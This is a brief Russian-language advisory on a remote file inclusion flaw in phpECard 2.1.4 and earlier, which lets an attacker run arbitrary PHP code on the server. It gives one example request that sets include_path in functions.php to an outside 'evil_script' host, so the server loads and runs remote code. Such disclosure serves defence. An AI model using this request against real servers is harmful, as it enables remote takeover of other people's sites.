Программа: phpECard <= 2.1.4

Нападающий может выполнить произвольный
PHP-код на сервере.

Пример:

http://sitename.com/[Script Path]/functions.php?include_path=http://evil_script?

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии